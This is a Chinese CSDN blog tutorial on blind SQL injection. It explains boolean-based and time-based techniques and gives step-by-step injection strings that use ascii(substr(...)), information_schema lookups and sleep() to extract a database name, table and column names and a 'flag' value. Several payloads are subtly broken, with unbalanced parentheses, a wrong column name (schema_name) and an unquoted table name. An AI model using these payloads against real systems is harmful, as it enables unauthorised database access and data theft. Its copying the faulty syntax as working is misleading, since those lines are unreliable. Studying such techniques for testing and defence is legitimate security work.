sql注入——盲注

最新推荐文章于 2023-12-05 16:18:12 发布
最新推荐文章于 2023-12-05 16:18:12 发布
阅读量188 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33441500/article/details/103041561
版权

 

sql注入——盲注

一,盲注介绍
所谓盲注就是在服务器没有错误回显的时候完成注入攻击。
盲注分为布尔盲注和时间盲注
布尔盲注:boolean 根据注入信息返回true or fales 没有任何报错信息
时间盲注:界面返回值ture 无论输入任何值,返回的情况都是正常的来处。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。
二,盲注需要掌握的函数
length()返回字符串长度
substr()截取字符串
substr(str,num,ptr)
ascii()返回字符串的ascii码
sleep(n)将程序挂起n秒
if(exp1,exp2,exp3)判断语句,如果第一个语句正确执行第二个,如果错误执行第三个语句
三,布尔盲注测试流程
1,猜解当前数据库名称长度

id=1'and (length(select database()))>8--+

2,利用ascii码猜解当前数据库名称

and (ascii(substr(database(),1,1)))=115--+

返回正常,说明数据库名第一位是s

and (ascii(substr(database(),2,1)))=101--+

返回正常,说明数据库名第二位是e
3,猜表名

and (ascii(substr(select table_name from information_schema.tables  where schema_name = database() limit 0,1),1,1)))=101--+

返回正常说明数据库表名第一位是e
4,猜字段名

and (ascii(substr(select column_name from information_schema.columns  where table_name = email limit 0,1),1,1)))=102--+

返回正常,说明email表中的列名第一位是f
5,猜内容

and ascii(substr(select flag from email limit 0,1),1,1)))=122--+

返回正常,说明flag字段内容第一位是z
四,时间盲注测试流程
1,首先判断数据库名长度

id=1'and (length(select database()))>8--+

2,利用if语句进行条件判定

and if(ascii(substr(database(),1,1))>120,1,sleep(10)--+

如果语句未延迟执行那么第一个语句成立,那我们可以依次往后判断
时间盲注就是不停的利用语句查看运行的时间来判断前面语句是否成立

 

-stem-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入——盲注和手工注入】
bosskim的博客
06-13 1223
温故知新,学习sql注入分类
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL注入——盲注
金色%夕阳的博客
05-27 1424
sql注入——盲注 1.回顾 回显注入主要应用于数据库中的数据可以再网站的页面上直接展示出来。 报错注入主要应用于网站的页面上存在原始报错信息,数据库中的数据在原始报错信息中展示出 来。也被称为报错回显。 原理:由于用户不可控输入,攻击者可以任意的输入恶意的sql语句,造成sql语义发生改变,从而引起数据库和操作系统的风险。 风险:数据操作、登录绕过、文件操作、命令执行、注册表操作。 防御:过滤、预编译。 2.盲注漏洞场景 1.数据库中的数据并不会在页面上直接展示,将查询出的结果通过判断,将判断之后的结果
DVWA之sql注入——盲注
Williamanddog的博客
12-22 3077
DVWA的盲注
SQL注入——时间盲注
heyingcheng的博客
03-07 1104
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
SQL注入——布尔盲注
TGFXK的博客
03-21 284
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3790
SQL注入2——布尔型盲注(重学)
SQL注入——盲注(left方法)
zdzzdz123123的博客
11-04 2605
SQL注入——盲注(left方法) 1、拿到题目后首先判断闭合规则,目前有如下几种情况 select id=’ ’ select id=" " select id=’( )’ select id="( )" select id =( ) 二、fuzz规则 通过 order by 10000 --+ 来作为结尾 前面fuzz数据库的闭合规则 在id = 1“ 时 页面回显异常 说明 闭合方式为第二种 双引号闭合 三、之后开始猜测数据库名 第一条payload为 id=1" and left(database
13、SQL注入——SQL盲注
qq_55202378的博客
12-05 325
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时还需要利用一些方法进行判断或尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能时页面内容的不同,也可能时响应时间的不同)。一般情况下,盲注可分为两种:基于布尔的盲注某些情况下,页面返回的结果只要两种(正常或者错误)。通过构造SQL判断语句,查看页面的返回结果(True 或False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。基于时间的盲注
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 702
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注(SQL Blind Injection)是一种常见的网络安全漏洞,...同时,这也提醒了系统管理员,对于SQL注入防护的重要性,应加强输入验证,避免敏感信息的泄露。
SQL注入攻击——信息安全
08-20
SQL盲注SQL注入的一种变体,攻击者在无错误信息或固定响应的情况下进行攻击,需要通过真假问题和延迟注入等技术来推测数据库信息。 为了防止SQL注入攻击,开发者应遵循以下最佳实践: 1. 使用预编译语句(如参数...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
* SQL盲注:是一种类型的SQL注入攻击,攻击者可以通过猜测数据库名和其他敏感信息来获取访问权限。 * 手工注入:是一种类型的SQL注入攻击,攻击者可以通过手动输入恶意数据来获取访问权限。 * BurpSuite:是一个Web...
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文).zip
08-05
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文)
PPO(Proximal Policy Optimization,近端策略优化)算法
最新发布
08-05
在解答2024年华数杯全国大学生数学建模竞赛的C题“老外游中国”时,虽然PPO(Proximal Policy Optimization,近端策略优化)算法主要是应用于强化学习领域,特别是在解决连续动作空间的策略优化问题上,但在此数学建模竞赛中,它并不直接适用于数据处理、综合评价或路径规划等任务。不过,我们可以从数据处理和决策优化的角度,类比强化学习中的一些思想来构思解题策略。 然而,对于本题而言,我们可以更侧重于数据分析、综合评价模型(如层次分析法AHP、TOPSIS、模糊综合评价等)和路径规划算法(如Dijkstra、A*、遗传算法等)来解决问题。以下是对各个问题的进一步建模思路: 一、问题1建模思路 1.1 数据处理与分析 数据收集与清洗:首先,需要加载所有352个城市的CSV文件,对每个城市的100个景点信息进行数据清洗,去除无效或缺失的关键信息(如评分缺失的景点)。 最高分查找:遍历所有景点,找到最高评分(BS),并统计获评该评分的景点数量。 城市排名:统计每个城市获评BS的景点数量,并根据数量多少进行排序,列出前10个城市。 二、问题2建模思路 2.1 综合评价体系构建
中国城市统计年鉴(1985-2023)
08-05
《中国城市统计年鉴》是全面反映中国城市社会经济发展情况的资料性年刊。《中国城市统计年鉴—2023》收录了2022年全国各级城市社会经济发展等方面的主要统计数据。 本年鉴内容共分四个部分: 第一部分是全国城市行政区划,列有不同区域、不同级别的城市分布情况; 第二、三部分分别是地级以上城市统计资料和县级城市统计资料,具体包括人口、资源环境、经济发展、科技创新、人民生活、公共服务、等方面的数据; 第四部分是附录,为主要统计指标解释。 需要说明的是,从1997年开始,地级以上城市和县级城市分别采用不同的统计制度,有些指标在两类城市之间不具有可比性,故本年鉴将地级以上城市和县级城市统计资料分为独立的两部分。本年鉴所涉及的全国或全部城市统计资料,均未包括香港特别行政区、澳门特别行政区和台湾省。
振中TP900 驱动工具2.2
08-05
振中TP900 驱动工具2.2
大学信息安全试题精选12
08-05
大学信息安全试题精选 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值